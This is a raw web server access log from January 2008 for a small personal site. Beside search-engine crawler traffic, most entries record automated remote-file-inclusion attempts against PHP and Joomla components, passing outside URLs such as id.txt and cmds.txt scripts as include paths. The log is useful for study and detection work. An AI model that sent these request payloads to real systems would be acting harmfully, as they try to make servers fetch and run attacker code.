74.208.99.103 - - [04/Jan/2008:01:58:47 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.99.103 - - [04/Jan/2008:01:58:47 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.99.103 - - [04/Jan/2008:01:58:47 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.4.196.37 - - [04/Jan/2008:01:59:46 -0800] "GET /logs/admin.php?include_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.114.141.206 - - [04/Jan/2008:01:59:47 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.206 - - [04/Jan/2008:01:59:47 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.206 - - [04/Jan/2008:01:59:48 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.235 - - [04/Jan/2008:02:01:42 -0800] "GET /megumi/?M=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.123.49.18 - - [04/Jan/2008:02:04:18 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.123.49.18 - - [04/Jan/2008:02:04:19 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.123.49.18 - - [04/Jan/2008:02:04:19 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.123.49.18 - - [04/Jan/2008:02:05:44 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.99.103 - - [04/Jan/2008:02:06:30 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.145.198 - - [04/Jan/2008:02:07:26 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.198 - - [04/Jan/2008:02:07:26 -0800] "GET /logs/ HTTP/1.0" 200 29109 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
208.67.252.215 - - [04/Jan/2008:02:09:15 -0800] "GET /logs/access_071216.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.67.252.215 - - [04/Jan/2008:02:09:15 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.67.252.215 - - [04/Jan/2008:02:09:15 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.67.252.215 - - [04/Jan/2008:02:09:16 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.67.252.215 - - [04/Jan/2008:02:09:16 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.67.252.215 - - [04/Jan/2008:02:09:26 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.213.32 - - [04/Jan/2008:02:14:28 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.32 - - [04/Jan/2008:02:14:29 -0800] "GET /megumi/Necklace/?M=A HTTP/1.0" 200 4307 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.32 - - [04/Jan/2008:02:14:34 -0800] "GET /megumi/Necklace/?S=A HTTP/1.0" 200 4307 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
61.221.117.246 - - [04/Jan/2008:02:15:44 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.221.117.246 - - [04/Jan/2008:02:15:49 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.221.117.246 - - [04/Jan/2008:02:15:54 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
128.121.21.39 - - [04/Jan/2008:02:16:31 -0800] "GET /modules/xfsection/modify.php?dir_module=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
128.121.21.39 - - [04/Jan/2008:02:16:31 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
204.15.252.72 - - [04/Jan/2008:02:16:45 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.multiplan.pl/images/stories/appdata/groups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.62.34 - - [04/Jan/2008:02:19:47 -0800] "GET /logs/access_071229.log/?mosConfig_live_site=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [04/Jan/2008:02:19:47 -0800] "GET /?mosConfig_live_site=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [04/Jan/2008:02:19:47 -0800] "GET /logs/?mosConfig_live_site=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 29125 "-" "libwww-perl/5.79" "www.dmulk.com"
147.163.25.77 - - [04/Jan/2008:02:20:49 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.163.25.77 - - [04/Jan/2008:02:20:55 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.163.25.77 - - [04/Jan/2008:02:21:00 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.163.25.77 - - [04/Jan/2008:02:24:01 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.71 - - [04/Jan/2008:02:24:18 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.46.84 - - [04/Jan/2008:02:30:35 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [04/Jan/2008:02:30:35 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [04/Jan/2008:02:30:35 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.58.118 - - [04/Jan/2008:02:32:53 -0800] "GET /index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.58.118 - - [04/Jan/2008:02:32:57 -0800] "GET /logs/index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.6.8.71 - - [04/Jan/2008:02:34:40 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [04/Jan/2008:02:34:41 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [04/Jan/2008:02:35:56 -0800] "GET /bikes/dteel/MVI_2434.AVI HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.84.152.125 - - [04/Jan/2008:02:45:50 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mondmurmel.de/alleswirdbesser/tool/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
88.84.152.125 - - [04/Jan/2008:02:45:50 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mondmurmel.de/alleswirdbesser/tool/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
74.6.8.71 - - [04/Jan/2008:02:50:33 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.206 - - [04/Jan/2008:02:50:36 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.206 - - [04/Jan/2008:02:50:37 -0800] "GET /bikes/ HTTP/1.0" 200 2036 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.20.210 - - [04/Jan/2008:02:54:01 -0800] "GET /logs/access_070711.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
147.163.25.77 - - [04/Jan/2008:02:54:29 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.163.25.77 - - [04/Jan/2008:02:54:35 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.163.25.77 - - [04/Jan/2008:02:54:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.121.21.39 - - [04/Jan/2008:03:00:13 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
128.121.21.39 - - [04/Jan/2008:03:00:13 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
80.231.1.130 - - [04/Jan/2008:03:02:29 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [04/Jan/2008:03:02:29 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [04/Jan/2008:03:02:30 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.52.143.16 - - [04/Jan/2008:03:03:22 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
80.231.1.130 - - [04/Jan/2008:03:03:30 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.52.143.16 - - [04/Jan/2008:03:03:36 -0800] "GET /presto HTTP/1.1" 301 91 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
74.6.8.71 - - [04/Jan/2008:03:03:37 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [04/Jan/2008:03:03:52 -0800] "GET /bikes/dteel/ HTTP/1.0" 200 8117 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.52.143.16 - - [04/Jan/2008:03:03:56 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.16 - - [04/Jan/2008:03:03:58 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
74.6.8.71 - - [04/Jan/2008:03:35:19 -0800] "GET /funny/?N=D HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.215 - - [04/Jan/2008:03:37:32 -0800] "GET /logs/?N=D HTTP/1.0" 200 28521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.107.130 - - [04/Jan/2008:03:43:19 -0800] "GET /logs/access_071120.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.107.130 - - [04/Jan/2008:03:43:19 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.107.130 - - [04/Jan/2008:03:43:19 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.71 - - [04/Jan/2008:03:43:54 -0800] "GET /bikes/dteel/MVI_2430.AVI HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.107.130 - - [04/Jan/2008:03:44:38 -0800] "GET /logs/access_071120.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.107.130 - - [04/Jan/2008:03:44:38 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.107.130 - - [04/Jan/2008:03:44:38 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.70.241 - - [04/Jan/2008:03:48:03 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "www.dmulk.com"
66.249.70.241 - - [04/Jan/2008:03:48:04 -0800] "GET /megumi/earrings/11_Venetian_S_Blue_15.JPG HTTP/1.1" 200 588934 "-" "Googlebot-Image/1.0" "www.dmulk.com"
74.6.22.207 - - [04/Jan/2008:03:48:49 -0800] "GET /logs/access_071106.log HTTP/1.0" 200 29238 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.58.118 - - [04/Jan/2008:03:52:21 -0800] "GET /index.php?option=com_datsogallery&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.58.118 - - [04/Jan/2008:03:52:21 -0800] "GET /logs/index.php?option=com_datsogallery&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
85.214.58.118 - - [04/Jan/2008:03:52:53 -0800] "GET /index.php?option=com_easybook&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.58.118 - - [04/Jan/2008:03:52:53 -0800] "GET /logs/index.php?option=com_easybook&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.214.58.118 - - [04/Jan/2008:03:53:55 -0800] "GET /index.php?option=com_extplorer&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.214.58.118 - - [04/Jan/2008:03:53:57 -0800] "GET /logs/index.php?option=com_extplorer&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"